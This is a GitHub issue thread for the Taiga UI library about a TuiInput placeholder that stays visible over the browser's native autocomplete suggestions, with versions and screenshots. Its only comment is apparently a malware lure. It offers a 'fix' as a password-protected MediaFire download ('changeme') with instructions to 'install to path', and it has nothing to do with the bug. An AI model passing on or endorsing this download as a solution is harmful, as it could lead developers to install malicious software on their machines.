### ISSUE TITLE
🐞 -  Placeholder doesn't hide properly when using autocomplete with `TuiInput` component

### ISSUE THREAD

**Issue by NathyVZM** [taiga-family/taiga-ui#8778]
### Playground Link

https://stackblitz.com/edit/angular-8c8dqo?file=src%2Fapp%2Fapp.template.html

### Description

By implementing the `tui-input` component from the `@taiga-ui/legacy` package, when using the `autocomplete` HTML-native feature from the inputs the placeholder doesn't hide properly, leading to difficulties to read the autocomplete values in the inputs when hovering on them:

![image](https://github.com/user-attachments/assets/b1395622-556a-48e5-be92-51e198546961)
![image](https://github.com/user-attachments/assets/58d48ef8-b75d-468d-8bd9-43979d7e9931)

Once the user selects a value from the autocomplete, the placeholder hides as expected:

![image](https://github.com/user-attachments/assets/7dfc92bc-98a8-442b-9d66-8b1bf669ac00)
![image](https://github.com/user-attachments/assets/a78cd81d-d126-4c0a-a391-89c525d3bca6)

Yet the 1st case shouldn't happen. The expected behavior should be the placeholder hiding when hovering over the autocomplete options, not only when selecting them:

![image](https://github.com/user-attachments/assets/facebc88-f2bd-44c3-b98f-7e0fb41e0923)
*Screenshot from a personal app, uses Taiga UI v3*

**Link for the personal app**: https://6694400644e0e800087ae6f4--cinemafun.netlify.app/sign-up

### Angular version

18.2.1

### Taiga UI version

4.4.0

### Which browsers have you used?

- [X] Chrome
- [ ] Firefox
- [ ] Safari
- [X] Edge

### Which operating systems have you used?

- [ ] macOS
- [X] Windows
- [ ] Linux
- [ ] iOS
- [ ] Android

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
